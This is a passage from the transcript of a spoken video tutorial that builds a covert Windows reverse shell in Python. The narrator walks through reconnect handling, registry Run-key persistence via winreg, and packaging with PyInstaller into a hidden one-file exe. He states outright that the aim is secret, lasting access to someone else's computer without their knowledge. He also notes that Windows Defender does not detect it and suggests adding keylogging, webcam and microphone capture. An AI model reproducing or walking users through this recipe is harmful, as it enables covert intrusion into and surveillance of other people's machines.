that's basically how we get around it. That's basically how we can exit. So you can type exit and it'll do that. But we also need to think about, what about if the computer that we were using froze? What about if the program just froze and closed, and we didn't get a chance to type exit to close the client socket, and then to go back to waiting to accept the connection? We would not be able to connect again, so we need to get around that. Now we can get around that by the main function here, the while loop, because technically we are always in that while loop. We get the message, it's blank, we receive a chunk of data, we strip it down, decode it into a nice string format, and then we send it to our headquarters to be filtered through and do whatever it needs to do, and then it goes back again. But if the program froze, our client wouldn't be received, there wouldn't be no data to receive, and it'd actually get an error. And I think we can show this actually. If I just run this again, and we can see listening on localhost 5000, and it's exited. So what am I missing? Socket_init. Oh yeah, we haven't actually put socket_init in here. We need to do self.socket_init. So when we first start the program, it's going to listen for a connection, and then it's going to go straight to socket_init, comes here, and then it's just waiting for a connection, and it's not going to move from that line of code until it gets a connection. When it does, it goes to main. So we'll run this code. It's listening on localhost. We are going to connect to the reverse shell again. So if we just press Control C, we're not even going to do exit. just do Control C. So NCAT has just gone, and this is just yeah, it's over. So what we can do is we can do a try and an exception here. So while true, we can do try and then except. So with the except, we can close the socket. So we can do comment close, not close the socket, close the client socket, and then we'll just do self dot client underscore socket dot close, and then we can just do go to socket underscore init method and listen for another connection, and then self dot socket underscore init. So if we try that again now, and it's listening on localhost, we will connect to the reverse shell, and instead of exiting like we would normally, maybe the computer freezes and we lose connection like that. As you can see, the reverse shell is still running now. Before, connection got reset and it just got closed. That's it. We're locked out until they turn their computer off and come back online. We don't want to wait. We don't need that. So what we're going to do now is we're going to try and connect again. NCAT localhost 5000, enter. Rev shell, you have connected, and as you can see, it's got accepted connection 127001 localhost, and we've got a slightly different port number. Like I said, these port numbers are the port numbers of the actual program that we are using. So like NCAT, that's the client's program. Yeah, so that's cool. We can exit. If you do exit, yeah, you've exited like you did if you crashed or just press Control C. But because we are in NCAT on the console, you've got to still press Control C just to get out of NCAT. So you could just press Control C anyway. Either one though does it, and we've got past yeah, if it was to crash or something was to happen, we can still connect, which is really quite useful actually. And yeah, connected a third time. Yeah, fine. And obviously, yeah, this connection here, this first one, that would have closed, which has allowed us to connect again. Then once we crashed or exited, that connection closed, which then allowed us to connect again. They're not free connections, they're separate connections, each at different times. There's only ever one connection to the reverse shell, which is all we need. So it looks like we've done quite a lot so far. We've got the reverse shell. We've got pretty much everything we need. You can add to the headquarters or the HQ. You know, that's cool. We've got our common data, which we have added to the HQ. So now all we're really missing is the persistence to turn this script into an EXE that has some persistence that will stay on someone's machine secretly somewhere deep in their hard drive, not knowing about it, and we can just connect to it at will whenever the computer's on. That's what we're missing. So let's do that. So for that, we are going to we're going to want to import the WinReg module. I think all these modules imports are standard with Python, I think, anyway, so that's pretty good. So let's do import WinReg, and we're going to then do class persistence. We're going to do def init self, and we're going to do self.check_reg. So we're going to check the registry first to see if we've already added persistence, because we won't need to do it again otherwise. Also, quickly, I'm going to go down here and I'm going to change this rev shell. I know it's just a bit sad, but I'm just going to put malware instead. I just think it's better. But yeah, let's go up to persistence and let's do this. So to check the registry, we're going to do def and then check_reg self. I'm going to have a try. Now I'm going to actually create a new Python file here quickly, so I can show you how the reg is like and what is in it, and how we're doing it. It'll be a bit hard to test it out and show you with all the other code. So if we just so if we just quickly import winreg, and then we need the H key, so like reg H key equals winreg dot and then H key underscore current underscore user. So that's for the local user that's on. And then we need, like, the key is going to be winreg dot open key. And like I said, if you go on the winreg documents, you'll be able to read through this, and you know what I mean. But yeah, open key, and then we're going to use reg underscore H key, so the current user basically. And then the registry that we will be saving our EXE to start it up when the user logs in and is on is this here, which is software/Microsoft/Windows/current version/run. That will run the EXE on startup basically. So, we don't need F, it's R. So that's the path. And then 0 is it's in the docs. I can't remember. Winreg dot key underscore set underscore. Oh no, we don't want to set. We don't want to set it. We want to read it actually. So then you understand it a bit better. Key underscore read. Then we're going to just index it, so index will equal 0 at first. So if we do while true, and we do v equals winreg dot enum value, and then the key, and then the index. Now this enum value is in the documents. Basically, we're going to index the registry starting from 0, and it will you'll see it when we print it out. If we just do we just print v quickly, see what happens. Then we go quickly to here and see Python is running. Yeah. Okay, we want to v, yeah, print v index plus equals 1. So we will we'll print that, and it's got some invalid syntax. Yeah, don't need that. Okay, so we'll do that again, run that again. No more data is available. So yeah, as you can see, let me just pull this up. So we got cleaner, smart cleaning, which is like what I showed you earlier. We've got the rev shell server, and this is the address, that's the name, and the address and name. So there's only what 0, 1. If we print v, if we print the index and a space and then v, we do that again. Yeah, here we go. So index 0 is C cleaner, smart cleaning. Index 1 is the reverse shell. So basically, how we're going to read this though is we are going to increase the index, and then look, yeah, we get an error, OS error. So what we do is we start from 0, we read it, we increase it by 1, we read it, and if it doesn't find it and it gets to the end and it still hasn't found it, when we increase it 1 more, we get an error. So if it hasn't found it, we get an error. We catch that in the exception. We know we haven't found it, and in the exception we then go and do the add reg function, and it will just add it to the registry. So that's basically how we're doing it, if that makes sense. So we'll just bring that down. We go on the check reg, and we can actually copy some of that over, or quite a lot of it. So we copy some of that over, move it forward. So we've got the reg h key, we've got the key, we've got the index, we've got the loop because we need the loop. We've got the enum value, so we're enumerating through the values. We've got a key, we've got the index. We don't need to print it out, that's just for debugging. We can do if, and then rev shell underscore server not in v. So if the name that we choose to add to the registry, like, you can change it and delete it and so forth, but if we're going to do the rev shell underscore server, if that's not in v, we will increase the index by 1, and then we're going to do continue. This continue is going to basically start from the beginning of the loop. So it will check v is this with the index 0. If it's not in there, we add 1 to the index. Continue jumps us back to here. So index is 1. Is it in there? No. Plus 1 is 2. Start from the beginning. In the end, the index will run out. We'll get an error. So if it is in there, we can just return true, or do nothing, or whatever, but I'll just return true. And yeah, if it's not in there, we'll move to our exception, because the index will just get too high and it will go boom into the exception. And then we can do winreg dot close key, and then we need to close the key, because here we've opened it, so we need to just close it. And then we're going to do self dot add underscore reg, and then we'll create a add reg method to add it to the registry, basically. So add underscore reg self, do try, we can do the address, which will equal c slash desktop slash rev shell underscore server dot exe. Now obviously you need to get the address of where your exe is. Now this is just like a simple example, but obviously you can make it so that your exe goes in a specific folder, like a temp folder, and you can have another function that actually will look through, say, all the files in that folder for your name of the exe and add it that way, and so forth. But this is just, you know, a bit of a simple example. But reg underscore h key equals winreg.hkey current user, and then we need a key, which is going to be winreg. Just copy this key here, type thing. So we copy that key. It's going to be the same path, same key. It's 0, but instead of reading, we want to do key underscore set underscore value, because we want to add it to the registry. We're going to do winreg dot set value x, the key, the name, so rev shell underscore server 0, some kind of thing in the document, and then winreg dot reg underscore sz. Reg underscore sz is like something to do like a 0 string or something, 0 at the end of it or something. SZ, and then the address. And then we're just going to do winreg.close key and accept, and then pass. And I think that is actually all of it. Finally, I know this video is probably actually going to be pretty long, but you know, it is what it is. I could have just put this code on GitHub and you could have just copied it and used it, but maybe you'll learn, you know, something out of this, and you'll be able to just sit one day and just, you know, code something better than this, probably, to be honest. You know, it just takes a bit of time. But yeah, let's test this out and see if it works. So we'll save that, we'll run it, bring this up a little. So yeah, listening on localhost, we'll go to ncat. So yeah, let's run this code and make sure it works on that. So we've got accepted connection 127. I've already just connected them. So ls is giving us what's in the folders, change directories, that's all good still. So clear screen, let's do some data dot, not location or IP. We'll do core data dot machine, Windows, and the registry. We'll test the registry actually. So let's just get out of that. It's still listening and ready to accept the connection, but I'm going to actually explicitly just exit this. Let's turn it into a EXE now. So we've got the code, it's all working, it's all good. Where is the code actually? Rev show. Okay, let's put this away, put that away. We've got rev shell here. I'm going to bring up, get rid of that one. Let's just test. CC cleaner. We're going to remove it from the registry. We're going to create an EXE with the code we just writ together, and then we're going to make sure that works in case I made any mistakes, but I don't think I did. So we've got startup. We've got the rev shell server, it's enabled, that's going to start up every time I log in, unless I was to delete it, which I would, because I don't need it on my computer. So we'll delete that, so that's gone. So rev shell server, I'm going to press shift, right click, and I'm going to open PowerShell window here. Okay, py installer, py installer -w, which will hide the console and make it a hidden sort of exe, --1 file. So everything that script uses is all into one file, and then the rev shell server py. Press enter. So we're going to wait for that to do its thing. We'll get an exe, we'll load the exe up, and then connect to it through ncat and see if it all works. And yeah, like I said, you can add a lot cooler stuff to it, like the attack class, you know, view people's webcam, listen to their mic, take screenshots, keyloggers. You can add all sorts into this reverse shell. And funnily enough, Windows Defender is not going off either for this. Okay, so the exe is done, that's cool. So we go into dist, which is distribution, just got one file, reverse shell, click it, and the mouse, I think, well, the loading thing has gone, so I'm guessing it's working. We'll try and connect to it. So we'll do ncat localhost 5000, and yeah, we've got connection. So data.core ls cd ls go into d ls clear. Yeah, the reverse shell works. It's an EXE. Let's check out and see if we got any persistence. Need to refresh it. Oh, we haven't got any persistence, obviously, because we haven't even added the persistence class into the code. Actually, we wrote the code, but we didn't actually. Oh, gee, yeah. 1 second. We've got the class, we've got the check and add reg, but we actually just need to do something so simple. On the reverse shell here, on the init, before the create TCP socket, we just got to do create persistence for our reverse TCP shell exe on Windows. We do p equals persistence. There we go, we got persistence. We save that. We go back to here. We will delete that. Okay, I need to go to here and exit my reverse shell. Cancel that. Okay, so we're going to delete the dist. Delete that. What we're going to do is we're going to open up PowerShell again. We don't need that spec either. So py installer -w-1 file rev shell server. We'll run that again. Create an exe. We know all the code works and that, so this is only going to be to test to see if persistence is added. And then yeah, the tutorial is finally finished for you all. If you even made it this far. But I hope you enjoyed it if you did, and you learnt something. So yeah, cool, we'll just exit from this. We'll go to dist. We'll run the reversed shell. It's loading. And yeah, it is running. So let's see if it's been added. We're going to refresh it, go back to startup, and we've got the revshell underscore saver. Revshell underscore server.exe. Obviously I must have named it wrong, but whatever. But yeah, we've got the persistence now. So this on someone's computer, you've pooned them basically, and they won't have a clue about it. So yeah, pretty cool. So I hope you enjoyed this video. Leave a like, leave a comment, share the video, it helps me out. And I'll see you in another video. Yeah, goodbye.